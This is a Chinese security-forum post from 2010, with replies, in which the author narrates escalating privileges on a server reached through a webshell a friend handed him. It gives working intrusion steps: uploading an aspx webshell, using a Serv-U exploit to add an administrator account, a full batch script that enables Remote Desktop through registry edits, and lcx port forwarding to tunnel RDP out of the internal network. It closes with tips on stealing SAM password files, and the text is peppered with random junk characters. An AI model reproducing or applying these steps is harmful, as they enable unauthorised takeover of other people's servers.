【3.A.S.T】网络安全爱好者 » 原创专区 » 我的一次提权。。。

hyrz 发表于 2010-1-30 15:11

我的一次提权。。。

今天朋友丢了一个webshell给我，叫我帮他提权。拿到密码进去后，朋友说D盘可以浏览，进入D盘后看到很多敏感目录；如图1。
2wnA(hX5_@ [attach]1777[/attach]
"^WN:Xc'P/w )TtN.P1R(| @-u
   我个人有个习惯，每次拿到webshell我都要看看支不支持ASP.NET,我认为它一般权限大于asp,可能是管理的疏漏吧。如是传了个aspx的大马，用自带的端口扫描工具，扫了下端口，1433和43958都开了。哈哈！这下有希望了！为了不走往前老套的方法，想到找sa密码，哈哈！这样提权还没试过。用大马自带的工具，看了下iis下有多少个站，才2个，我想一定不是虚拟空间。打开网站根目录下的conn.asp文件后，让我差点没晕倒！！用的是access数据库，看来sa走不通。走不通怎么办？当然是继续走咯！想到服务器还安装了serv-u，于是在C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\路径找到su的快捷方式；如图2[attach]1778[/attach]（以后大家也可以参考我这种方法），用文本方式打开后找到了su的安装路径，心中一阵狂喜！原来su在D盘！哈哈，终于有希望了！找到su目录后当然是看ServUDaemon.ini文件是否能编辑，随便敲了几个字母回车后提示没权限。这种事情我早就预料到了！不过我还是有点怕,怕丢了大侠风范啊.哼。。看来要把它ServUDaemon.ini文件下载回来修改，由于电脑没装su,就全部下载回来了。打开一看还要注册，打开百度直接搜索破解版！~~~~(>_<)~~~~ 浪费了我宝贵的时间...安装好后给自己添加了一个管理员账户，目录设置在C盘。。。经过一番的修改，成了我一生最难忘的回忆。。。知道了吗？刚刚不是不可编辑吗？我修改它干什么？？倒。。。心里真的快要达到绝望的境界！看了前辈不少的教程的我，当然班门弄斧下。想到刚刚我打开su的时候没有提示输入密码，说明是默认的SU账号。这时心里的欲火终于燃烧起来!在我电脑的垃圾箱里找到了Lake2和GoldSun的提权脚本，传了上去后，手一直在抖,心里想会不会成功？？不成功一切都会结束？打开提权脚本，随意的设置了一下，点击添加，一会儿，提示添加成功。在cmdshell敲入"net user"，回显的结果让我晕过去。看来上天注定我很失败！！！回显里没有我那神圣的账号。难道是提权脚本的问题吗？换了GoldSun的脚本再来一次。打开后点击添加，很快显示了添加成功！再次在cmdshell敲入"net user"，有没！{:Yem98:Y} 看来一只鸡在我眼前都不能吃。。。收拾了战场，但心里还是过不去。现在都凌晨3：00了，而我一点睡意都没,可能都是这个webshell搞的。我不甘心啊。。。。在webshell我随便的逛了一下，点来点去，而就在这时我发现我的aspx大马里有一个su exp如图3，cmd这栏填入"net user XXX XXX /add"，点击添加，马上就显示一大堆信息！把滚动条拉到最后，有条信息让我乐翻了天;如图4和5.为了验证是否添加成功就在cmdshell敲入"net user";如图6。*{)i4L4l m nZ1n8@me
图3:
pS8J:^:S3[AD [attach]1779[/attach]wp+p3Vo

-m*gP7Q%@k_ 图4:^sMU
nj8|*h1i
[attach]1780[/attach]
l8[#z&C-p'RM 图5:m)w.@:KQ7VV
[attach]1781[/attach]
$a0n4cin,seD
(`Eo @pR4a } 图6:
%jK~SPK5q [attach]1782[/attach]
!\`R&~/f6pM
U1a+? O1LR9f'R*v zF+C|9y
     看来添加成功了！打开端口扫描，发现3389端口没开,就传了个3389.exe,等了片刻后，在cmdshell里执行了3389.exe,在刷新下页面，发现没有打开,看来生效了！为了让我渺小的心灵得到冲刷，顺便在这小小短短的时间里到网上看下MM.{:Yem55:Y} 片刻后，我再次打开webshell，可以访问了。再次用自带的端口扫描工具扫描了下，发现没开；什么原因？？晕死了。。。看来要问问Baidu了，过了一会我在网上找到了一个开3389 bat文件；代码如下：[code]echo Windows Registry Editor Version 5.00>>3389.reg
&v/p,M-xx2G:WR echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg s#uH!gw)R\/Zd
echo "fDenyTSConnections"=dword:00000000>>3389.reg -ObOSNM6e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
;t}-vi)~*zx;S echo "PortNumber"=dword:00000d3d>>3389.reg ;zk/KJ|%aU{Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
QS+vw3]4pq%e echo "PortNumber"=dword:00000d3d>>3389.reg
;s%JC0a| f$M$c regedit /s 3389.reg 4s1Hf`)Q~{d
del 3389.reg[/code]传到服务器运行了下，3389端口这才开了！兴奋的ing!想不到一个简单脚本叫比的上3389.exe，而且不要重启，真够凹。。。在cmdshell里敲入"ipconfig"回车，发现是内网的，怎么办？？就算是开了3389也不一定连接的上，而且webshell的ip也显示内网的IP(如图7)，刚刚还没看到，一看晕死！以为内网IP跑天下呢。。。刚好上次看了一个教程，叫端口转发，教程很简单！我推荐大家看下。
K8r}P&M;J)b(`b
#z @3S}$j:Aq
q 图7：
K$AH4|5V(`s{ j$W [attach]1783[/attach].Z6s'MK'S
Fk
N
,S:W*r#l2e/DG
    传了一个lcx.exe端口转发工具后，在cmdshell里执行"D:\DotComDemo\inc\lcx.exe -slave 本机公网ip 51 目标本地ip 3389 "（简单介绍:(将目标ip的3389端口转发到本机的51端口);如图8;0c0c'_.H/Lgc

&^!r}V%k
C 图8:6k(Tx3}"~Ao Q
[attach]1784[/attach]
4M_X,Jl'L3Z &J9lR |Q3E
      然后在本机执行"lcx.exe -listen 51 880"，(简单介绍:监听本机的51端口，将目标主机转发过来的3389端口开放在本机的880端口)
9vPO8IJ^ 然后用mstsc连接本机880端口登陆(127.0.0.1:880) )记住如果lcx不做当前目录，就写绝对路径。倒！本机的lcx.exe没有回显，（如图:9）就再次在cmdshell里重复执行了一次，本地的lcx还是没回显！难道失败了？心里想，可能有时没回显吧。打开mstsc连接"127.0.0.1:880"，哈哈！连接上了！如图10.敲入刚刚添加的账号，连接成功！如图11.哈哈。到此提权就结束了！c%Q)O(f8S
图9: g+m.pY#_
[attach]1785[/attach]"Tu7I#Y?|
图10:
,d
h |_)?'d$D-V w [attach]1786[/attach]r4[V8_%yU:O CFP~
d%J-|t \/iV b
y W.x
图11：
3TI&m&H}E%L [attach]1787[/attach]4s(Aw e'GW[4S3}c[
       不过个人还是有点经验给大家分享！如果大家拿到webshell可以看看支不支持ASP.NET(aspx),如果支持可能会给你一个好的收获！还有一些黑友抱怨，sam文件下载不到或复制不到，个人之前用php大马就可以下载的了，你们可以试下！小弟的文笔有点差，能看的就将就看下。有什么问题加我Q:345432349.千万不要问我帮忙之类的，我们可以一起交流分享！

柔肠寸断 发表于 2010-1-30 20:12

aspx  su   lcx....

hyrz 发表于 2010-1-30 20:23

断肠是不是你改了我{:Yem52:Y}标题？

柔肠寸断 发表于 2010-1-30 23:32

额，是的，要像篇文章啊。。。

fl2012 发表于 2010-1-31 03:49

学习吧都是知识

zollll 发表于 2010-2-12 09:46

楼主真厉害，3389

lr163 发表于 2010-3-5 19:38

呵呵，学习了，谢谢楼主的分享！

lr163 发表于 2010-3-5 19:38

呵呵，学习了，谢谢楼主的分享！

在意z 发表于 2012-5-16 00:16

谢谢楼主分享技术。。。

查看完整版本: 我的一次提权。。。